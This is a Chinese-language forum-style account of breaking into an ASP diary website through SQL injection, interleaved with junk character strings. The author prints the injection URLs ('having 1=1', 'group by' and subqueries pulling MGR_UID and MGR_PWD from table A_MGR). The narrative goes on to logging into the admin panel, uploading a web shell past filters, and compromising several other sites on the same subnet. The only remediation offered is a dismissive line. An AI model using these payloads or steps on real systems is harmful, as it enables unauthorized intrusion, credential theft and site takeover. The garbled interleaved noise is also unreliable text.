发现一个注入点/ M& U: ^5 E2 D- v+ Z! G
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389* {5 r7 R1 }5 `! @
/ P4 i, a& f9 Z* S: {( {5 `) Q
习惯性的加’having1=1--
& d0 G0 z7 w: Y+ B- v' |
' q. m9 F ^. @$ R+ s! Hhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—% D9 I4 o! W, ~* U$ j' S8 J
/ B* a* a+ U& a0
' E& l& c7 I8 }) V6 h
. |& D/ n6 N5 b1 a5 u' D爆出Diary_A.dl_Title(这时候很激动啊)
6 }5 q# I8 k% _, u
/ I* s+ e) N7 T9 }那么继续0 v% ?6 f: l3 ~- I, {1 k- H! X6 w) Q
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
$ v+ W, R7 V* x) v. t) j' J# g/ D0 E; o
继续,一直爆下去; O- a6 E9 ]2 m$ j* H+ F
* M5 x2 Q1 W1 n% Q0 W
爆到几个字段和表段 但是没找到需要的管理用户的字段
# ]4 h; h- g# [% o+ v
! }+ u( c$ j) |" _8 H; D* { D$ y蛋疼了 怎么办 然后去后台登陆页看源码, E2 a* q, d1 G0 p4 X! l0 G
( I& ?9 I. C- a' U8 \, V, |! d8 V0
3 @) f) @7 Q8 @: X0 M$ [# k4 i
Input name= “ADUID”
0 T$ B3 h q' }( u. C/ _. K/ BInput name= “ADPWD”
^( m8 V- ~( |1 l1 m4 ]% Q3 O* b) h. e+ L4 P; u# _
很幸运 找到了字段那就继续
3 e0 V" m W- F& n找到之后开始爆用户
" |" D d# K# r( `" ?- C! Nhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
' \- |4 ^ a" ?1 t$ g3 ^爆密码3 M" _ F. }# G, G6 J/ M2 f: X
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—! `2 p( N; S+ ?+ M1 w2 F
测试了下 这个注入点只能爆到文章哪里的表
- A4 W, {& m, v4 p& Y3 r9 e2 t. v. X* ?/ Y3 p* _
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了' r; w3 `& e" T; d" g1 N$ d
% `4 P! K2 d: n1 J4 C
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了8 Y) j% ~2 B) [
/ }. W+ e' G, N+ `- g9 N1 j& f$ i
4734 t" _4 C K/ i/ K7 l
/ F3 Y# m" w* p4 y1 [
进后台
) i) x# [; Q; H" x0 _: H! d# i# \% _, P6 }$ C
1 ]. _5 t$ o' P* z, C' }* i
发现几个上传点 有的地方不能上传 而且防止恶意代码5 Q5 G" x2 Y3 Y" k. [
& Q( e2 C) ^/ i没办法 各种百度各种找大牛 找到一只好像可以突破的马8 d( [2 e! \6 m
$ e8 `4 w- d! c: `0 x5 ^
4 U3 v$ E$ V: M在系统管理那里直接上传 不过没有显示地址
& K$ v! e3 h% g: e$ }& D2 P) o3 l% U q* t- k) p7 w/ V# U% ]
再上传一次 抓包 搞定OK
$ Q4 J2 L8 C& n8 _" a! j. j( Q: _; a. v/ _% G$ U
" Q* X- V( a n$ n% h+ t7 H6 z
8 P, c/ v5 v) E$ v5 S: c) |* r472
! P2 T3 B) S! t! w+ @% n5 Z7 r3 i0 x+ H. }9 d
晚上不行了 去睡觉。。。# E9 {) U" L$ G2 D7 \8 ^! j5 P; ]
第二天刚起床 闲的没事做继续日站吧 7 k; p- G. {. i8 ^) ^
7 O" p5 G: Y, Z: [; \
找个站 就把这个站的旁c扫了下
! j. R! s' W8 q, ?; m( H0 h! r
3 ]% u6 ]3 E. Q4 B发现c段也有一个购物站 ,然后还和这个站的模板差不多/ l' j- B& g! ~% i; v
. `6 T; ?* u( T. [就找到会员登录口测试9 Q! e8 _8 }1 ]) g$ R6 ]' c* T0 U0 W
( x9 I" a$ G! O: F# S# a1 a* m1 m'and (select top 1 MGR_UID from A_MGR)>0—
$ d1 C; s7 j% h7 R果断爆到了 这时候我很激动 通杀+ B# S5 y6 |; A# F
5 Z. W: _$ r9 H3 N
再次翻c段+ Q0 A& e1 ]+ a9 _% q. {5 y4 v
1 a2 s9 x# @7 _; G' f6 ^8 t
翻出几个站 都成功拿下2 r0 J9 l7 N" A
: k7 X+ c/ ~/ B. x. ~2 m" ?9 \ b3 v8 y% e2 n1 X
: i/ c3 r+ W. u! n修复方案:" W! T$ V/ I! o* D/ c9 T9 j
他们比我专业
8 ?( u. P$ z. \, {/ M
5 C; S& Q" H" I9 K1 a
7 _2 J8 q& i. m+ E1 y% k& \5 x+ |! a8 g4 g& G+ [
|